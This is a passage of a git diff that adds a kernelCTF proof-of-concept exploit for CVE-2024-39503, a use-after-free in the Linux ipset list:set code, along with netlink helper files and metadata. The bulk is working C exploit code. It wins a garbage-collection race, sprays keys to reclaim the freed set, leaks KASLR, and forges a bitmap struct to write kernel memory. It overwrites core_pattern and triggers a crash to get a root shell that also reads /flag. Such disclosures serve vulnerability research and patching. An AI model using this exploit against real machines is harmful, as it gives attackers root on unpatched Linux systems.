long)&readout.key.data, 0x0101, 0) < 0); + + if (!strncmp("$$$$", &readout.ip_set.name[8], 4)) { + printf("successfully reclaimed key with set object (sprayed %d sets)!\n", name_idx); + printf(" leaked bitmap_port_type: %p\n", readout.ip_set.type); + printf(" leaked data: %p\n", readout.ip_set.data); + break; + } + + if (name_idx >= 0xFFFF) { + printf("failed to reclaim object!\n"); + abort(); + } + } + + // apply KASLR leak + u64 diff = (u64)readout.ip_set.type - bitmap_port_type; + #define __x(name) { name += diff; } + FOR_ALL_OFFSETS(__x); + #undef __x + + // now we prepare the set to have our desired elements + // the elements will fake another struct bitmap_port, so that we can directly + // hijack the map->elements pointer to perform arbitrary kernel memory writes + // We will use it to overwrite the core_pattern + + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + strcpy(&list_set_name[8], &readout.ip_set.name[8]); + printf("target set: %s\n", list_set_name); + + const struct bitmap_port fake = { + .members = (void*)core_pattern, + .first_port = 0, + .last_port = sizeof(target_core_pattern) * 8, + .elements = 0 + }; + + // we only need the first members, so one element is enough + const u64* counters = (void*)&fake; + ip_set_add_bitmap_port_elem(msg, list_set_name, 9000, counters[0], counters[1]); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + FAIL_IF(send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len) != 0); + + // setup complete, free the set again. + FAIL_IF(keyctl(KEYCTL_REVOKE, k, 0, 0, 0) < 0); + + synchronize_rcu(); + + memcpy(&payload, &readout, sizeof(readout)); + // the name of the set will be the size of the payload after the key payload + // reclaimed the set object + strcpy(payload.ip_set.name, (void*)&payload_size); + + // we prepped data in such a way that we can "shift" it a little bit into + // our fake bitmap structure + payload.ip_set.data = payload.ip_set.data + sizeof(struct bitmap_port); + + // reclaim the set with another key + while (1) { + + for (int j = 0; j < 128; j++) { + if (j == i) { + continue; + } + + if (keys[j]) { + if (keyctl(KEYCTL_UPDATE, keys[j], (unsigned long)&payload.key.data, payload_size, 0) < 0) { + // for some reason this may fail sporadically. I presume we accidently corrupt some + // key managment structures in that case + perror("keyctl()"); + keys[j] = 0; + } + } + } + + int failure = 0; + for (int byte = 0; byte < sizeof(target_core_pattern) && !failure; byte++) { + for (int bit = 0; bit < 8; bit++) { + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + if ((target_core_pattern[byte] >> bit) & 1) { + // we can avoid overwriting the counters by setting them to -1 + // this way, we do not accidently corrupt any data oob of our fake bitmap type + ip_set_add_bitmap_port_elem(msg, (void*)&payload_size, byte * 8 + bit, ~0, ~0); + } else { + ip_set_del_bitmap_port_elem(msg, (void*)&payload_size, byte * 8 + bit); + } + msg->nlmsg_flags |= NLM_F_ACK; + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + int err = send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len); + if (err == -ENOENT) { + failure = 1; + break; + } + + if (err < 0 && err != -IPSET_ERR_EXIST) { + perror("bitmap add/del elem"); + return -1; + } + } + } + + if (!failure) { + // success. if we made it this far we can likely trigger root.. + printf("spray succeeded!\n"); + FAIL_IF(write(notify_fd, "x", 1) < 0); + + while (1) { + sleep(1000); + } + } + + usleep(500); + } + } + } + // no need to try for too long, the window is small + } while (get_jiffies() - begin < 400); + + // display some stats. only useful for debugging + struct timespec t2; + clock_gettime(CLOCK_MONOTONIC, &t2); + + printf("child signal : %lu.%lu\n", t0.tv_sec, t0.tv_nsec); + printf("start spraying: %lu.%lu\n", t1.tv_sec, t1.tv_nsec); + printf("stop spraying : %lu.%lu\n", t2.tv_sec, t2.tv_nsec); + + status_spray = SPRAY_RETRY; + return 0; +} + + +int try_trigger_bug(void* arg) { + EVENT_WAIT(trigger_bug); + + // we want to allocate sets on a known CPU. + _pin_to_cpu(MAIN_CPU); + + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + int tfd; + FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); + + struct itimerspec it = {}; + + u32 total_len = 0; + struct nlmsghdr* msg = (void*)scratch_buf_try_trigger_bug; + + bzero(scratch_buf_try_trigger_bug, BUF_SIZE); + total_len = 0; + msg = (void*)scratch_buf_try_trigger_bug; + + char list_set_name[3] = {'!', 'A', '\0'}; + + for (int j = 0; j < 10; j++) { + list_set_name[1] = 'A' + j; + ip_set_add_list_set(msg, list_set_name, 1, 0); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + + // we need to add only one elem per set here. Problem is that multiple elements in a set + // may easily cause double-frees which are detected by free list hardening + for (int i = 0; i < 1; i++) { + char name[3] = {0}; + snprintf(name, sizeof(name), "%x", i); + + ip_set_add_bitmap_port(msg, name, 9999, 9999, 0); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + for (int j = 0; j < 10; j++) { + list_set_name[1] = 'A' + j; + ip_set_add_list_set_elem(msg, list_set_name, name, 1); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + } + + // the gc timers are initialized throughout a ~ 25 jiffies window + // the timers are set to expire after 1 * 1000 jiffies + // timer expiry is ~ 50 jiffie accurate, biased towards later timeouts + // when the process exits, a grace period of ~ 15 jiffies elapses until + // the ns clean up runs (i.e. 15 jiffies after the parent receives the signal) + // the process exit signal delivery to the parent is sub-jiffie accurate + // + // with all the noise, a little sub 1 sec seems to be the optimal expiry + // if you have trouble reproducing, this is the parameter to tune + it.it_value.tv_sec = 0; + it.it_value.tv_nsec = 960 * NS_PER_JIFFIE; + + FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); + + if (send_check(nfd, (void*)scratch_buf_try_trigger_bug, total_len) != 0) { + perror("netlink_send()"); + return -1; + } + + _pin_to_cpu(HELPER_CPU); + + close(nfd); + + u64 tmp; + read(tfd, &tmp, sizeof(tmp)); + + exit(0); +} + +int main(int argc, char *argv[]) { + // check if we are root + if (!getuid()) { + // we provided the pid of the faulting process as argument + pid_t pid = strtoul(argv[1], NULL, 10); + + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(shell[0], shell, NULL); + return 0; + } + + printf("Hello World!\n"); + + // setup a worker which will trigger the core_pattern + // we do this before anything else because any namespace exit after the bug + // trigger will likely panic the kernel + int pipefds[2] = {}; + FAIL_IF(pipe(pipefds)) + int fault_worker; + FAIL_IF((fault_worker = fork()) < 0); + if (!fault_worker) { + close(pipefds[1]); + + // blocks until the spray worker will signal success + char buf[1]; + FAIL_IF(read(pipefds[0], buf, 1) < 0); + + // trigger segfault + asm volatile ("xor %rax, %rax; movq $0, (%rax);"); + + return 0; + } + + close(pipefds[0]); + + FAIL_IF((scratch_buf_spray_fake_set = calloc(BUF_SIZE, 1)) == NULL); + FAIL_IF((scratch_buf_try_trigger_bug = calloc(BUF_SIZE, 1)) == NULL); + + try_trigger_bug_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(try_trigger_bug_stack == MAP_FAILED); + try_trigger_bug_stack += 0x8000; + spray_fake_set_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(spray_fake_set_stack == MAP_FAILED); + spray_fake_set_stack += 0x8000; + + // try hitting the race + do { + int spray_worker_pid = clone(spray_fake_set, spray_fake_set_stack, CLONE_VM | SIGCHLD, &pipefds[1]); + FAIL_IF(spray_worker_pid < 0); + + FAIL_IF(waitpid(spray_worker_pid, NULL, 0) < 0); + + } while (status_spray == SPRAY_RETRY); + + if (status_spray == SPRAY_ERROR) { + return -1; + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c new file mode 100644 index 00000000..5d707f63 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c @@ -0,0 +1,153 @@ +#include "netlink.h" + +#include +#include +#include +#include +#include +#include + + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type; + attr->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)attr + NLA_HDRLEN, data, data_len); + + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len) { + attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* a = (void*)(attr) + attr->nla_len; + + a->nla_type = nla_type; + a->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)a + NLA_HDRLEN, data, data_len); + + attr->nla_len += a->nla_len; + return a->nla_len; +} + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type | NLA_F_NESTED; + attr->nla_len = NLA_HDRLEN; + + return attr; +} +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr) { + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type) { + attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* child = (void*)attr + attr->nla_len; + + child->nla_type = nla_type | NLA_F_NESTED; + child->nla_len = NLA_HDRLEN; + + return child; +} +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner) { + parent->nla_len += inner->nla_len; + return inner->nla_len; +} + + +int __netlink_send(int fd, const void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + return 0; +} + +int netlink_recv(int fd, void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = 0, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = NULL, + .msg_iovlen = 0, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = MSG_TRUNC, + }; + + memset(nlh, 0, size); + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT); + if ((ssize_t)iov.iov_len < 0) { + if (errno == EAGAIN) { + return 0; + } + + perror("recvmsg()"); + return -1; + } + if (iov.iov_len > size) { + fprintf(stderr, "message too large: %zu > %zu\n", iov.iov_len, size); + return -1; + } + + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +int netlink_errno(const struct nlmsghdr* nlh) { + if (nlh->nlmsg_len == 0) { + return 0; + } + if (nlh->nlmsg_type != NLMSG_ERROR) { + fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type); + return 0; + } + struct nlmsgerr* e = NLMSG_DATA(nlh); + if (e->error != 0) { + errno = -e->error; + } + + return e->error; +} + +int netlink_open(int proto) { + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + int s = socket(AF_NETLINK, SOCK_RAW, proto); + if (s < 0) { + perror("socket()"); + return s; + } + if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { + perror("bind()"); + return -1; + } + + return s; +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h new file mode 100644 index 00000000..f88e8f58 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h @@ -0,0 +1,41 @@ +#ifndef __H_NETLINK +#define __H_NETLINK + +#include +#include + +#include + +typedef uint16_t u16; + +static inline void* nlmsg_end(struct nlmsghdr* nlh) { + return (char*)(nlh) + NLMSG_ALIGN(nlh->nlmsg_len); +} + +static inline void* nlattr_end(struct nlattr* attr) { + return (char*)(attr) + NLMSG_ALIGN(attr->nla_len); +} + +int netlink_open(int proto); + +int netlink_recv(int fd, void* nlh, size_t size); + +int __netlink_send(int fd, const void* nlh, size_t size); +static inline int netlink_send(int fd, const struct nlmsghdr* nlh) { + return __netlink_send(fd, nlh, nlh->nlmsg_len); +} + +int netlink_errno(const struct nlmsghdr* nlh); + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len); + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type); +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr); + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type); +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner); + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len); + + +#endif /* __H_NETLINK */ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json new file mode 100644 index 00000000..04927821 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json @@ -0,0 +1,32 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp169", "exp172"], + "vulnerability": { + "cve": "CVE-2024-39503", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e7aaa6b82d63e8ddcbfb56b4fd3d014ca586f10", + "affected_versions": ["6.8-rc3 - 6.10-rc4"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_IP_SET", + "CONFIG_IP_SET_LIST_SET" + ] + } + }, + "exploits": { + "lts-6.6.30": { + "environment": "lts-6.6.30", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "70%" + }, + "cos-109-17800.218.20": { + "environment": "cos-109-17800.218.20", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "70% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz new file mode 100644 index 00000000..b6f5fb9b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz new file mode 100644 index 00000000..5ae12ac5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz differ